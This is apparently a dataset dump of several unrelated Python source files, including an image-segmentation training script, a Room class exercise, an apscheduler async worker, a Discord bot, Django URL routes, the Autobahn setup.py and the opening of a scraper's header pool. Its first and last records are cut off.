panavatar.get_svg(size[0], size[1])\n svg2png(bytestring=svg_code, write_to=os.path.join(str(input_img_path), '{}.png'.format(i)))\n input_image = Image.open(os.path.join(str(input_img_path), '{}.png'.format(i)))\n\n target_image = Image.new(\"RGB\", size, (0, 0, 0))\n img_c = img.copy()\n\n x_offset = random.randint(-50, 50)\n y_offset = random.randint(-50, 50)\n\n random_rot = random.randint(-45, 45)\n\n img_w, img_h = img.size\n bg_w, bg_h = target_image.size\n\n offset = ((bg_w - img_w) // 2+ x_offset, (bg_h - img_h) // 2+ y_offset)\n img_c = img_c.rotate(random_rot, expand=0)\n\n img_bw_c = img_bw.copy()\n\n img_bw_c = img_bw_c.rotate(random_rot, expand=0)\n\n input_image.paste(img_c, offset, img_c)\n target_image.paste(img_bw_c, offset, img_bw_c)\n\n input_image.save(os.path.join(str(input_img_path), \"{}.png\".format(i)))\n target_image.save(os.path.join(str(output_img_path), \"{}.png\".format(i)))\n\n\ndef calculate_area_of_overlap(img_1, img_2):\n \"\"\"Calculate area of overlap\"\"\"\n img1 = img_1.copy()\n img2 = img_2.copy()\n img1[img1 == 255] = 1\n img1[img1 == 0] = 0\n img2[img2 == 255] = 1\n img2[img2 == 0] = -1\n aoo = np.sum(img1.flatten() == 
img2.flatten())\n return aoo\n\n\ndef not_overlapping(prev_img, candidate, offset):\n prev_img_c = prev_img.copy()\n candidate_c = candidate.copy()\n cand_img = Image.new(\"RGB\", size, (0, 0, 0))\n cand_img.paste(candidate_c, offset, candidate_c)\n return calculate_area_of_overlap(np.array(prev_img_c),np.array(cand_img))==0\n\ndef prepare_data2(input_img_path, output_img_path, n_examples):\n os.makedirs(str(input_img_path), exist_ok=True)\n os.makedirs(str(output_img_path), exist_ok=True)\n\n icons_img_paths = glob.glob(\n os.path.join(str(icons_paths), \"*.png\")\n )\n\n for i in tqdm(range(n_examples)):\n icons_rand_sample_paths = random.choice(icons_img_paths, random.randint(1,5))\n\n svg_code = panavatar.get_svg(size[0], size[1])\n svg2png(bytestring=svg_code, write_to=os.path.join(str(input_img_path), '{}.png'.format(i)))\n input_image = Image.open(os.path.join(str(input_img_path), '{}.png'.format(i)))\n target_image = Image.new(\"RGB\", size, (0, 0, 0))\n j = 0\n while j < len(icons_rand_sample_paths):\n file_name = os.path.basename(icons_rand_sample_paths[j]).split(\".\",1)[0]\n img = Image.open(icons_rand_sample_paths[j])\n img = img.resize((50, 50))\n img_bw = img.copy()\n img_array = np.array(img_bw)\n img_array[img_array[..., -1] != 0] = [255, 255, 255, 255]\n\n img_bw = Image.fromarray(img_array)\n\n img_c = img.copy()\n\n x_offset = random.randint(-80, 80)\n y_offset = random.randint(-80, 80)\n\n random_rot = random.randint(-45, 45)\n\n img_w, img_h = img.size\n bg_w, bg_h = target_image.size\n\n offset = ((bg_w - img_w) // 2+ x_offset, (bg_h - img_h) // 2+ y_offset)\n img_c = img_c.rotate(random_rot, expand=0)\n\n img_bw_c = img_bw.copy()\n\n img_bw_c = img_bw_c.rotate(random_rot, expand=0)\n\n target_image_copy = target_image.copy()\n\n if not_overlapping(prev_img = target_image_copy, candidate=img_bw_c,offset = offset) or j == 0:\n input_image.paste(img_c, offset, img_c)\n if file_name in target_icons:\n target_image.paste(img_bw_c, offset, img_bw_c)\n j = j+1\n\n input_image.save(os.path.join(str(input_img_path), \"{}.png\".format(i)))\n target_image.save(os.path.join(str(output_img_path), \"{}.png\".format(i)))\n\n\ndef get_data(images_path, segs_path):\n input_image_paths = glob.glob(os.path.join(images_path, \"*.jpg\")) + glob.glob(\n os.path.join(images_path, \"*.png\")\n )\n input_image_paths.sort()\n segmentation_image_paths = glob.glob(os.path.join(segs_path, \"*.jpg\")) + glob.glob(\n os.path.join(segs_path, \"*.png\")\n )\n\n segmentation_image_paths.sort()\n\n\nclass DataGenerator(keras.utils.Sequence):\n\n def __init__(self, input_filenames, target_filenames, batch_size):\n self.input_filenames = input_filenames\n self.target_filenames = target_filenames\n self.batch_size = batch_size\n\n def __len__(self):\n return (np.ceil(len(self.input_filenames) / float(self.batch_size))).astype(np.int)\n\n def __getitem__(self, idx):\n batch_x_files = self.input_filenames[idx * self.batch_size: (idx + 1) * self.batch_size]\n batch_y_files = self.target_filenames[idx * self.batch_size: (idx + 1) * self.batch_size]\n\n x = []\n y = []\n\n for i in range(len(batch_x_files)):\n input_image = np.array(Image.open(batch_x_files[i]).convert(\"RGB\"))\n input_image = cv2.resize(input_image, (size[0], size[1]))\n\n input_image = preprocess_input(input_image)\n\n target_image = cv2.imread(batch_y_files[i], 1)\n target_image = cv2.resize(target_image,(size[0], size[1]))\n\n target_image = preprocess_segmentation_image(target_image)\n x.append(input_image)\n y.append(target_image)\n x 
= np.array(x)\n y = np.array(y)\n\n return x, y\n\n\n\nif __name__ == '__main__':\n prepare_data2(train_images_path, train_segs_path,100)\n # binary segmentation (these parameters are the defaults when you call Unet('resnet34'))\n\n model = sm.Unet(BACKBONE, classes=1, activation='sigmoid', encoder_weights='imagenet')\n\n model.compile(\n optimizer=Adam(),\n loss=\"binary_crossentropy\",\n metrics=[\"binary_accuracy\"],\n )\n\n input_image_paths = glob.glob(\n os.path.join(str(train_images_path), \"*.png\")\n )\n input_image_paths.sort()\n\n segmentation_image_paths = glob.glob(\n os.path.join(str(train_segs_path), \"*.png\")\n )\n\n segmentation_image_paths.sort()\n\n x_train_files, x_test_files, y_train_files, y_test_files = train_test_split(input_image_paths, segmentation_image_paths, test_size=0.2, random_state=42)\n\n training_generator = DataGenerator(x_train_files, y_train_files , batch_size=64)\n\n validation_generator = DataGenerator(x_test_files, y_test_files , batch_size=64)\n\n history = model.fit_generator(generator=training_generator,\n validation_data=validation_generator, epochs=100)\n\n fig = plt.figure()\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n fig.savefig('loss_test_20_epochs.png')\n model.save('model.h5')\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"474398730","text":"class Room:\n\n def __init__(self, number, capacity):\n self.number = number\n self.capacity = capacity\n self.guests = 0\n self.is_taken = False\n\n def take_room(self, people):\n if self.capacity >= people and not self.is_taken:\n self.guests += people\n self.is_taken = True\n else:\n return f\"Room number {self.number} cannot be taken\"\n\n def free_room(self):\n if self.is_taken:\n self.guests = 0\n self.is_taken = False\n else:\n return f\"Room number {self.number} is not taken\"\n\n\n# Testing\n# room = Room(101, 5)\n# room.take_room(4)\n# print(room.guests)\n# room.free_room()\n# print(room.guests)\n# print(room.free_room())\n","sub_path":"attributes_and_methods_lecture3/LAB/project/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"605480951","text":"from __future__ import annotations\n\nimport os\nimport platform\nfrom contextlib import AsyncExitStack\nfrom datetime import datetime, timezone\nfrom inspect import isawaitable\nfrom logging import Logger, getLogger\nfrom traceback import format_tb\nfrom typing import Any, Callable, Iterable, Optional, Set, Type, Union\nfrom uuid import UUID\n\nimport anyio\nfrom anyio import TASK_STATUS_IGNORED, create_task_group, get_cancelled_exc_class\nfrom anyio.abc import CancelScope, TaskGroup\n\nfrom ..abc import AsyncDataStore, DataStore, EventSource, Job\nfrom ..adapters import AsyncDataStoreAdapter\nfrom ..enums import RunState\nfrom ..events import (\n AsyncEventHub, Event, JobAdded, JobCompleted, JobDeadlineMissed, JobFailed, JobStarted,\n SubscriptionToken, WorkerStarted, WorkerStopped)\n\n\nclass AsyncWorker(EventSource):\n \"\"\"Runs jobs locally in a task group.\"\"\"\n\n _task_group: Optional[TaskGroup] = None\n _stop_event: Optional[anyio.Event] = None\n _state: RunState = RunState.stopped\n _acquire_cancel_scope: Optional[CancelScope] = 
None\n _datastore_subscription: SubscriptionToken\n _wakeup_event: anyio.Event\n\n def __init__(self, data_store: Union[DataStore, AsyncDataStore], *,\n max_concurrent_jobs: int = 100, identity: Optional[str] = None,\n logger: Optional[Logger] = None):\n self.max_concurrent_jobs = max_concurrent_jobs\n self.identity = identity or f'{platform.node()}-{os.getpid()}-{id(self)}'\n self.logger = logger or getLogger(__name__)\n self._acquired_jobs: Set[Job] = set()\n self._exit_stack = AsyncExitStack()\n self._events = AsyncEventHub()\n self._running_jobs: Set[UUID] = set()\n\n if self.max_concurrent_jobs < 1:\n raise ValueError('max_concurrent_jobs must be at least 1')\n\n if isinstance(data_store, DataStore):\n self.data_store = AsyncDataStoreAdapter(data_store)\n else:\n self.data_store = data_store\n\n @property\n def state(self) -> RunState:\n return self._state\n\n async def __aenter__(self):\n self._state = RunState.starting\n self._wakeup_event = anyio.Event()\n await self._exit_stack.__aenter__()\n await self._exit_stack.enter_async_context(self._events)\n\n # Initialize the data store\n await self._exit_stack.enter_async_context(self.data_store)\n relay_token = self._events.relay_events_from(self.data_store)\n self._exit_stack.callback(self.data_store.unsubscribe, relay_token)\n\n # Wake up the worker if the data store emits a significant job event\n wakeup_token = self.data_store.subscribe(\n lambda event: self._wakeup_event.set(), {JobAdded})\n self._exit_stack.callback(self.data_store.unsubscribe, wakeup_token)\n\n # Start the actual worker\n self._task_group = create_task_group()\n await self._exit_stack.enter_async_context(self._task_group)\n await self._task_group.start(self.run)\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n self._state = RunState.stopping\n self._wakeup_event.set()\n await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)\n del self._task_group\n del self._wakeup_event\n\n def subscribe(self, callback: Callable[[Event], Any],\n event_types: Optional[Iterable[Type[Event]]] = None) -> SubscriptionToken:\n return self._events.subscribe(callback, event_types)\n\n def unsubscribe(self, token: SubscriptionToken) -> None:\n self._events.unsubscribe(token)\n\n async def run(self, *, task_status=TASK_STATUS_IGNORED) -> None:\n if self._state is not RunState.starting:\n raise RuntimeError(f'This function cannot be called while the worker is in the '\n f'{self._state} state')\n\n # Signal that the worker has started\n self._state = RunState.started\n task_status.started()\n self._events.publish(WorkerStarted())\n\n try:\n while self._state is RunState.started:\n limit = self.max_concurrent_jobs - len(self._running_jobs)\n with CancelScope() as self._acquire_cancel_scope:\n try:\n jobs = await self.data_store.acquire_jobs(self.identity, limit)\n finally:\n del self._acquire_cancel_scope\n\n for job in jobs:\n self._running_jobs.add(job.id)\n self._task_group.start_soon(self._run_job, job)\n\n await self._wakeup_event.wait()\n self._wakeup_event = anyio.Event()\n except get_cancelled_exc_class():\n pass\n except BaseException as exc:\n self._state = RunState.stopped\n self._events.publish(WorkerStopped(exception=exc))\n raise\n\n self._state = RunState.stopped\n self._events.publish(WorkerStopped())\n\n # async def _run_job(self, job: Job) -> None:\n # # Check if the job started before the deadline\n # start_time = datetime.now(timezone.utc)\n # if job.start_deadline is not None and start_time > job.start_deadline:\n # event = 
JobDeadlineMissed(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=start_time, start_deadline=job.start_deadline)\n # self._events.publish(event)\n # return\n #\n # now = datetime.now(timezone.utc)\n # if job.start_deadline is not None:\n # if now.timestamp() > job.start_deadline.timestamp():\n # self.logger.info('Missed the deadline of job %r', job.id)\n # event = JobDeadlineMissed(\n # now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,\n # scheduled_fire_time=job.scheduled_fire_time, start_time=now,\n # start_deadline=job.start_deadline\n # )\n # await self.publish(event)\n # return\n #\n # # Set the job as running and publish a job update event\n # self.logger.info('Started job %r', job.id)\n # job.started_at = now\n # event = JobUpdated(\n # timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id\n # )\n # await self.publish(event)\n #\n # self._num_running_jobs += 1\n # try:\n # return_value = await self._call_job_func(job.func, job.args, job.kwargs)\n # except BaseException as exc:\n # self.logger.exception('Job %r raised an exception', job.id)\n # event = JobFailed(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=now, start_deadline=job.start_deadline,\n # traceback=format_exc(), exception=exc\n # )\n # else:\n # self.logger.info('Job %r completed successfully', job.id)\n # event = JobSuccessful(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=now, start_deadline=job.start_deadline, return_value=return_value\n # )\n #\n # self._num_running_jobs -= 1\n # await self.data_store.release_jobs(self.identity, [job])\n # await self.publish(event)\n #\n # async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):\n # if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):\n # wrapped = partial(func, *args, **kwargs)\n # return await to_thread.run_sync(wrapped)\n #\n # return_value = func(*args, **kwargs)\n # if isinstance(return_value, Coroutine):\n # return_value = await return_value\n #\n # return return_value\n\n async def _run_job(self, job: Job) -> None:\n event: Event\n try:\n # Check if the job started before the deadline\n start_time = datetime.now(timezone.utc)\n if job.start_deadline is not None and start_time > job.start_deadline:\n event = JobDeadlineMissed(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline)\n self._events.publish(event)\n return\n\n event = JobStarted(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline)\n self._events.publish(event)\n try:\n retval = job.func(*job.args, **job.kwargs)\n if isawaitable(retval):\n retval = await retval\n except BaseException as exc:\n if exc.__class__.__module__ == 'builtins':\n exc_name = exc.__class__.__qualname__\n else:\n exc_name = f'{exc.__class__.__module__}.{exc.__class__.__qualname__}'\n\n formatted_traceback = '\\n'.join(format_tb(exc.__traceback__))\n 
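# format_tb() yields only the formatted stack frames; the exception message itself is carried separately in exc_name\n 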
event = JobFailed(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline, exception=exc_name,\n traceback=formatted_traceback)\n self._events.publish(event)\n else:\n event = JobCompleted(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline, return_value=retval)\n self._events.publish(event)\n finally:\n self._running_jobs.remove(job.id)\n await self.data_store.release_jobs(self.identity, [job])\n\n # async def stop(self, force: bool = False) -> None:\n # self._running = False\n # if self._acquire_cancel_scope:\n # self._acquire_cancel_scope.cancel()\n #\n # if force and self._task_group:\n # self._task_group.cancel_scope.cancel()\n #\n # async def wait_until_stopped(self) -> None:\n # if self._stop_event:\n # await self._stop_event.wait()\n","sub_path":"src/apscheduler/workers/async_.py","file_name":"async_.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"651069147","text":"#https://github.com/Rapptz/discord.py\r\nimport discord\r\nimport discord.ext\r\nimport asyncio\r\nfrom discord import Game\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport random\r\nimport os\r\nimport sys\r\nfrom tkinter import *\r\nfrom subprocess import call\r\n\r\n\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n#LOGOS COMMANDS \r\n if message.content.upper().startswith('-1ST LOGO'):\r\n embed = discord.Embed(title=\"The Deer\", description=\"A deer followed by our name and slogan!\", color=0x8A2BE2) \r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291921695473665/Capture.PNG\")\r\n await client.send_message(message.channel, embed=embed)\r\n if message.content.upper().startswith('-2ND LOGO'):\r\n embed = discord.Embed(title=\"The Paint Splash\", description=\"A splash of paint on a wall followed by our name and slogan!\", color=0x8A2BE2)\r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291857078288384/logo-preview-6645700b-398a-4c93-946a-b643ac9d11dc.jpg?width=300&height=300\")\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.upper().startswith('-3RD LOGO'):\r\n embed = discord.Embed(title=\"The Crossed Arrows\", description=\"Two crossed arrows followed by our name and slogan!\", color=0x8A2BE2) \r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291855186395136/logo-preview-51aa1a3b-a500-496c-bbf9-48bc6ae9a402.jpg?width=300&height=300\")\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n#STAFF APP COMMAND\r\n if message.content.upper().startswith('-STAFFAPP'):\r\n embed = discord.Embed(title=\"Staff Application\", description=\"Click the link to be redirected to Google where you can apply to be staff!\", color=0x2B8AE2) \r\n embed.add_field(name=\"Google Link\", value=\"https://goo.gl/forms/NZuAAgVgQjU6NX743\", inline=True)\r\n await client.send_message(message.channel, embed=embed)\r\n await client.delete_message(message)\r\n\r\n#COPY AND PASTE BELOW FOR EASY TEMPLATES\r\n\r\n#Embed\r\n \r\n#Line splitter 
\\n\r\n    \r\n#Simple if's\r\n    if 'VOIDED Grass(BLOCKER)' in message.content:\r\n        userID = message.author.id\r\n        await client.send_message(message.channel, \"<@%s> Type -help for a list of our commands!\" % (userID))\r\n        await client.delete_message(message) \r\n\r\n#INVITE LINK\r\n    if message.content.upper().startswith('-INV'):\r\n        embed = discord.Embed(title=\"Here is the invite link for our server!\", description=\"https://discord.gg/e9jwv6z\", color=0xeef442)\r\n        await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n#List of commands\r\n    \r\n    if message.content.upper().startswith('-HELP'):\r\n        embed = discord.Embed(title=\"Here is a list of commands you can enter!\", description=\"More commands will be added soon!\", color=0xeeff00)\r\n        embed.add_field(name=\"Commands\", value=\"-Staffapp \\n This is a link to our staff application. \\n -Inv \\n This will instantly give you the invite link for our server. \\n -1stLogo \\n This will show the 1st of 3 logo designs, one of which will eventually be the main logo. \\n -2ndLogo \\n This will show the 2nd of 3 logo designs, one of which will eventually be the main logo. \\n -3rdLogo \\n This will show the last of 3 logo designs, one of which will eventually be the main logo.\", inline=True)\r\n        await client.send_message(message.channel, embed=embed)\r\n    if message.content.upper().startswith('-123)'):\r\n        embed = discord.Embed(title=\"Here is a list of our commands\", description=\"Eventually there will be more\", color=0xeef442)\r\n        embed.add_field(name=\"-StaffApp\", value=\"This is a link to our staff application.\", inline=True)\r\n        embed.add_field(name=\"-Inv\", value=\"This will instantly give you the invite link for our server.\", inline=True)\r\n        embed.add_field(name=\"-1stLogo\", value=\"This will show the 1st of 3 logo designs, one of which will eventually be the main logo.\", inline=True)\r\n        embed.add_field(name=\"-2ndLogo\", value=\"This will show the 2nd of 3 logo designs, one of which will eventually be the main logo.\", inline=True)\r\n        embed.add_field(name=\"-3rdLogo\", value=\"This will show the last of 3 logo designs, one of which will eventually be the main logo.\", inline=True)\r\n        await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n\r\n    if message.content.upper().startswith('!PING'):\r\n        userID = message.author.id\r\n        await client.send_message(message.channel, \"<@%s> Pong!\" % (userID))\r\n        await client.delete_message(message)\r\n\r\n\r\n\r\n    if '@484360841894821888' in message.content:\r\n        embed = discord.Embed(title=\"Hello Good Morning, Good Evening, Good Night, Good Day you awoke me!\", description=\"Don't do this too often please\", color=0xa0132f)\r\n        embed.add_field(name=\"Need Help?\", value=\"Either do -help or contact a staff member!\", inline=True)\r\n        await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Login\r\n@client.event\r\nasync def on_ready():\r\n    print('Connected')\r\n    print('Username: ' + client.user.name)\r\n    print('ID: ' + client.user.id)\r\n    await client.change_presence(game=Game(name=\"OOps\"))\r\n\r\nclient.run(os.getenv('TOKEN'))\r\n","sub_path":"EMBED_FFS.py","file_name":"EMBED_FFS.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"607053315","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = \"costumer\"\n\n\nurlpatterns =[\n path('',views.index,name ='index'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('add/',views.addcostumer,name='add'),\n path('our_costumer/',views.ourcostumers,name='our_costumer'),\n path('detail//',views.detail,name='detail'),\n path('edit//',views.update,name='update'),\n path('chat/',views.Chating,name='chat'),\n\n]","sub_path":"costumer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"554534208","text":"###############################################################################\r\n##\r\n## Copyright (C) 2011-2014 Tavendo GmbH\r\n##\r\n## Licensed under the Apache License, Version 2.0 (the \"License\");\r\n## you may not use this file except in compliance with the License.\r\n## You may obtain a copy of the License at\r\n##\r\n## http://www.apache.org/licenses/LICENSE-2.0\r\n##\r\n## Unless required by applicable law or agreed to in writing, software\r\n## distributed under the License is distributed on an \"AS IS\" BASIS,\r\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n## See the License for the specific language governing permissions and\r\n## limitations under the License.\r\n##\r\n###############################################################################\r\n\r\nfrom __future__ import absolute_import\r\n\r\nfrom distutils import log\r\n\r\ntry:\r\n from ez_setup import use_setuptools\r\n use_setuptools()\r\nexcept Exception as e:\r\n log.warn(\"ez_setup failed: {0}\".format(e))\r\nfinally:\r\n from setuptools import setup\r\n\r\nimport platform\r\nCPY = platform.python_implementation() == 'CPython'\r\n\r\nimport sys\r\nPY3 = sys.version_info >= (3,)\r\nPY33 = sys.version_info >= (3,3) and sys.version_info < (3,4)\r\n\r\n\r\nLONGSDESC = \"\"\"\r\nAutobahn|Python is a network library implementing\r\n\r\n * The WebSocket Protocol\r\n * The Web Application Messaging Protocol (WAMP)\r\n\r\nfor Twisted and Asyncio on Python 2 and 3.\r\n\r\nAutobahn|Python is part of the Autobahn project:\r\n\r\nThe Autobahn project provides open-source implementations of the\r\nWebSocket and WAMP protocols. 
WebSocket allows bidirectional real-time\r\nmessaging on the Web and WAMP adds asynchronous Remote Procedure Calls\r\nand Publish & Subscribe on top of WebSocket.\r\n\r\nMore information:\r\n\r\n * https://github.com/tavendo/AutobahnPython/blob/master/README.md\r\n * http://autobahn.ws/python\r\n * http://wamp.ws\r\n\r\nSource code:\r\n\r\n * https://github.com/tavendo/AutobahnPython\r\n\"\"\"\r\n\r\n## get version string from \"autobahn/__init__.py\"\r\n## See: http://stackoverflow.com/a/7071358/884770\r\n##\r\nimport re\r\nVERSIONFILE=\"autobahn/__init__.py\"\r\nverstrline = open(VERSIONFILE, \"rt\").read()\r\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\r\nmo = re.search(VSRE, verstrline, re.M)\r\nif mo:\r\n verstr = mo.group(1)\r\nelse:\r\n raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\r\n\r\n\r\n## Autobahn core packages\r\n##\r\npackages = ['autobahn',\r\n 'autobahn.wamp',\r\n 'autobahn.wamp.test',\r\n 'autobahn.websocket',\r\n 'autobahn.websocket.test',\r\n 'autobahn.asyncio',\r\n 'autobahn.twisted',\r\n 'twisted.plugins',\r\n 'autobahn.wamp1', # WAMPv1 - remove this later\r\n ]\r\n\r\nif PY3:\r\n if PY33:\r\n ## \"Tulip\"\r\n asyncio_packages = [\"asyncio>=0.2.1\"]\r\n else:\r\n ## Python 3.4+ has asyncio builtin\r\n asyncio_packages = []\r\nelse:\r\n ## backport of asyncio\r\n asyncio_packages = [\"trollius>=0.1.2\", \"futures>=2.1.5\"]\r\n\r\n\r\n## Now install Autobahn ..\r\n##\r\nsetup(\r\n name = 'autobahn',\r\n version = verstr,\r\n description = 'Autobahn|Python provides WebSocket and WAMP for Twisted and Asyncio',\r\n long_description = LONGSDESC,\r\n license = 'Apache License 2.0',\r\n author = 'Tavendo GmbH',\r\n author_email = 'autobahnws@googlegroups.com',\r\n url = 'http://autobahn.ws/python',\r\n platforms = ('Any'),\r\n install_requires = ['six>=1.6.1'],\r\n extras_require = {\r\n ## asyncio is needed for Autobahn/asyncio\r\n 'asyncio': asyncio_packages,\r\n\r\n ## you need Twisted for Autobahn/Twisted - obviously\r\n 'twisted': [\"Twisted>=11.1\"],\r\n\r\n ## native WebSocket and JSON acceleration: this should ONLY be used on CPython\r\n 'accelerate': [\"wsaccel>=0.6.2\", \"ujson>=1.33\"] if CPY else [],\r\n\r\n ## for (non-standard) WebSocket compression methods - not needed if you\r\n ## only want standard WebSocket compression (\"permessage-deflate\")\r\n 'compress': [\"python-snappy>=0.5\", \"lz4>=0.2.1\"],\r\n\r\n ## needed if you want WAMPv2 binary serialization support\r\n 'serialization': [\"msgpack-python>=0.4.0\"]\r\n },\r\n packages = packages,\r\n zip_safe = False,\r\n ## http://pypi.python.org/pypi?%3Aaction=list_classifiers\r\n ##\r\n classifiers = [\"License :: OSI Approved :: Apache Software License\",\r\n \"Development Status :: 5 - Production/Stable\",\r\n \"Environment :: No Input/Output (Daemon)\",\r\n \"Framework :: Twisted\",\r\n \"Intended Audience :: Developers\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 2\",\r\n \"Programming Language :: Python :: 2.6\",\r\n \"Programming Language :: Python :: 2.7\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 3.3\",\r\n \"Programming Language :: Python :: 3.4\",\r\n \"Programming Language :: Python :: Implementation :: CPython\",\r\n \"Programming Language :: Python :: Implementation :: PyPy\",\r\n \"Programming Language :: Python :: Implementation :: Jython\",\r\n \"Topic :: Internet\",\r\n \"Topic :: Internet :: WWW/HTTP\",\r\n \"Topic :: 
Communications\",\r\n \"Topic :: System :: Distributed Computing\",\r\n \"Topic :: Software Development :: Libraries\",\r\n \"Topic :: Software Development :: Libraries :: Python Modules\",\r\n \"Topic :: Software Development :: Object Brokering\"],\r\n keywords = 'autobahn autobahn.ws websocket realtime rfc6455 wamp rpc pubsub twisted asyncio'\r\n)\r\n\r\n\r\n\r\ntry:\r\n from twisted.internet import reactor\r\nexcept:\r\n HAS_TWISTED = False\r\nelse:\r\n HAS_TWISTED = True\r\n\r\n\r\nif HAS_TWISTED:\r\n # Make Twisted regenerate the dropin.cache, if possible. This is necessary\r\n # because in a site-wide install, dropin.cache cannot be rewritten by\r\n # normal users.\r\n try:\r\n from twisted.plugin import IPlugin, getPlugins\r\n list(getPlugins(IPlugin))\r\n except Exception as e:\r\n log.warn(\"Failed to update Twisted plugin cache: {}\".format(e))\r\n else:\r\n log.info(\"Twisted dropin.cache regenerated.\")\r\n\r\n ## verify that Autobahn Twisted endpoints have been installed\r\n try:\r\n from twisted.internet.interfaces import IStreamServerEndpointStringParser\r\n from twisted.internet.interfaces import IStreamClientEndpointStringParser\r\n\r\n has_server_endpoint = False\r\n for plugin in getPlugins(IStreamServerEndpointStringParser):\r\n if plugin.prefix == \"autobahn\":\r\n has_server_endpoint = True\r\n break\r\n\r\n if has_server_endpoint:\r\n log.info(\"Autobahn Twisted stream server endpoint successfully installed\")\r\n else:\r\n log.warn(\"Autobahn Twisted stream server endpoint installation seems to have failed\")\r\n\r\n has_client_endpoint = False\r\n for plugin in getPlugins(IStreamClientEndpointStringParser):\r\n if plugin.prefix == \"autobahn\":\r\n has_client_endpoint = True\r\n break\r\n\r\n if has_client_endpoint:\r\n log.info(\"Autobahn Twisted stream client endpoint successfully installed\")\r\n else:\r\n log.warn(\"Autobahn Twisted stream client endpoint installation seems to have failed\")\r\n\r\n except:\r\n log.warn(\"Autobahn Twisted endpoint installation could not be verified\")\r\n","sub_path":"autobahn/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218216956","text":"#coding:utf-8\nimport datetime\n\nfrom itertools import islice\nfrom urllib.request import urlopen\n\nfrom multiprocessing import Process\nimport schedule\nimport urllib.request\nimport random\nimport time\nimport json\nimport os\nimport pandas as pd\n\n# print (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) #日期格式化\ndef requests_headers(): #构造请求头池\n head_connection = ['Keep-Alive','close']\n head_accept = ['text/html,application/xhtml+xml,*/*']\n head_accept_language = ['zh-CN,fr-FR;q=0.5','en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3']\n head_user_agent = ['Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; rv:11.0) like Gecko)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070803 